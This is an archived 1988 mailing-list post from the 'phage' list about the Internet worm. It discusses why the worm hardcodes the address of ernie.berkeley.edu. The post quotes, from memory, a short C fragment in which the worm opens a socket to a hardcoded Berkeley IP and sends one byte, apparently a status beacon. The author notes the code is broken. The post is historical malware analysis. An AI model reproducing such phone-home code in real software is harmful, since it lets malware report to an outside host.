The 'Security Digest' Archives (TM)

Archive: About | Browse | Search | Contributions | Feedback
Site: Help | Index | Search | Contact | Notices | Changes

ARCHIVE: 'Phage List' - Archives (1988 - 1989)
DOCUMENT: phage #129 [Re: ernie.berkeley.edu] (1 message, 623 bytes)
SOURCE: http://securitydigest.org/exec/display?f=phage/archive/129.txt&t=text/plain
NOTICE: securitydigest.org recognises the rights of all third-party works.

START OF DOCUMENT

From: Chris Torek <chris@mimsy.umd.edu>
To: phage
Date: Mon 19:06:52 07/11/1988 EST
Subject: Re: ernie.berkeley.edu
References: [Thread Prev: 123] [Thread Next: 131] [Message Prev: 404] [Message Next: 407]

	From: Eric S. Johnson <esj@manatee.cis.ufl.edu>

	... Why is the internet address of ernie.berkeley.edu
	hardcoded into the virus?

No one knows.

	Someone on risks list said the virus was sending back status
	reports to ernie, but I can't imagine why it would do it.

That may have been the intent; the code, however, looked more or less
like

    s = socket(AF_INET, SOCK_STREAM, 0);
    if (s >= 0) {
	sin.sin_family = AF_INET;
	sin.sin_addr = inet_addr("128.32.134.16");	/* or .137.13 */
	sin.sin_port = ?;	/* I will not go verify this code; sorry */
	sendto(s, "", 1, 0, &sin, sizeof(sin));
	(void) close(s);
    }

But sendto() does not work on stream sockets!

Chris

END OF DOCUMENT